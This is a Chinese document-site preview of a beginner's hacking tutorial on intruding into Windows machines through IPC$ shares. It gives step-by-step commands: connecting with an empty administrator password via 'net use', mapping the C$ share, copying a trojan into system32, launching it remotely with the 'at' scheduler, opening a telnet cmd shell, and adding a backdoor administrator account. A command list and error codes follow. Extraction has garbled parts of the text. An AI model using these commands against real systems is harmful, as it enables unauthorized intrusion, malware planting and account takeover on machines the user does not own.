如何利用IPC$漏洞入侵_第1页
如何利用IPC$漏洞入侵_第2页
如何利用IPC$漏洞入侵_第3页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、 灌水 教你如何利用 IPC 漏洞入侵"高手勿进! 新手请进!首先我用局网里的一台存在IPC$漏洞的电脑给大家进行一次IPC$经典模式入侵的演 示!看我用X_SCAN扫到了一台开放139端口并且ADMINISTRATOR用户密码为 空的电脑!当然大家也可以用IPCSCAN扫,这样速度会更快!OK!下面开始入侵首先和对 方建立IP C$连接: net use 192.168.0.8ipc$ /user:"administrator"OK!成功!新手注意了,这里密码为空,所以""/user:"admi ni strator"这里

2、我就只打两个引号!如果对方有密码的话,就需要在引号中输入密码即可!OK!现在我们可以用net use x: 192.168.0.8c$来映射对方的硬盘!看成功了,不过权限是GUEST权限,有复制,粘贴权限! 现在我们可以传一个木马, 把他复制到 C:Docum开始菜单 程序 启动 中,如果对方机器从启之后木马会随系统自动启动的!这个方法由于要 等,所以我这里就不演示了!现在我就直接COPY个木马到对方的C盘的WINNTSYSTEM32目录下!OK,COPY 成功!命令如下:copy d:mu niu 192.168.0.8c$wi nn tsystem32好!既然我们已经COPY了木马过去现在

3、我们就要激活这个木马,我们才能完全入侵这台电脑啊!那要如何远程激活呢?总不可能跑到对方的电脑面前双击运行木马吧!(呵呵!) 这时候我们通常都用 at 命令!at 命令的意思是什么呢? at 命令是计划任务命令,就是在特定的时候执行某种程序的命令,许 多有定时杀毒功能的杀毒软件就是通过这个命令来执行杀毒任务的。一般来说, 如果是默认安装windows 的话,计划任务是会处于启动形式的!OK!现在我们键入net tim e W192.168.0.8来获取对方电脑的时间,呵呵,对方的时间是下午04:00现在我们就用AT来激活木马,命令at W192.168.0.84:02 muniu.exe实际意思

4、就是 atip time 程序名好现在我们就等2分钟木马会自动运行!OK,时间到,我传过去的木马在运行后会自动开启对方的2 3端口 TELNET!现在我们来连接对方tel net 192.168.0.8看到没有我们成功的拿到对方的 cmd shell让我们看看权限是什么net user nick 123 /add(创建一个名为nick 的用户,密码为 12 3) 成功net localgroup administrators nick /add(把 nick用户添加到管理员组)成功,呵呵管理员权限!爽,后面你想做什么就随便你了!以上就是我入侵的全过程,呵呵,全无技术可言,希望大家不要笑话!下面

5、我给大家介绍一些关于IPC$的基础知识:什么是IPC$:IPC$和共享资源效果差不多。IPC$是共享 命名管道”的资源,它对于程序间的通讯很重要。 在远程管理计算机和查看计算机的共享资源时使用!注意只有 win2k 和 2k以上的系统才拥ipc$管道,在9 8等系统下是没有IPC$的,所以也不能用IPC$来入侵9 8等系统!在初次安装系统时还开了默认共享,即所有的逻辑(c$ d$ e$.) !所有这些,都是微软为了方便管理员的管理,但是无意中降低了系统的安全性!所以IPC$并不是一个真正意义上的漏洞!c$ d$ e$.是什么意思:呵呵,很简单这是系统默认共享,你可以看看自己的电脑,表面上没有共

6、享任何的东西,但是在IPC$中是这样的吗?在c md键入n et share 看到没有,尽管我的盘里面没有共享任何东西,但在IPC$里是全部共享的!这意味着如果对方知道我们的用户名密码,就可以轻而易举的把我做成他的肉鸡!1 3 94 4 5 端口!IPC$所使用的是什么端口:很明显IPC$以来于TCP一下是我个人总结的一些IPC$入侵中的错误! 错误号5,拒绝访问:很可能你使用的用户权限不够错误号5 1. WINDOWS无法找到网络路径:网络有问题!lanmanworkstation 服务没有启错误号5 3,找不到网络路径:IP地址错误;目标未开机;目标有防火墙过滤了端口;目标删 除了IPC$

7、错误号6 7,找不到网络名:对方删除了IPC$或者你的动! 错误号121 除其中一个 错误号13 RD错误 错误号17 动 错误号229,6,2,2,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个IPC$,请删未知的用户名或错误的密码:很明显你的USERNAME或者PASSWO试图登陆,但是网络登陆服务没有启动:目标的NETLOGO N服务没有启此用户的密码已经过期:对方有帐号策略,强制定期更改一次密码!还有我们常在COPY东西的时候岀现失败原因大概如下:1.你的用户权限不够2 .对方有病毒防火墙,把你的木马杀掉了3.对方没有开放默认共享IPC$常用命令:net share ipc$ (开放 IPC$ )net share ipc$ /del ( 删除 IPC$ )net share c= c: (开放对方C盘的默认共享)n et start tel net (开放对方的 tel net 服务)net user usernam e /add (添加用户)n et localgroup admi ni strators user n

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论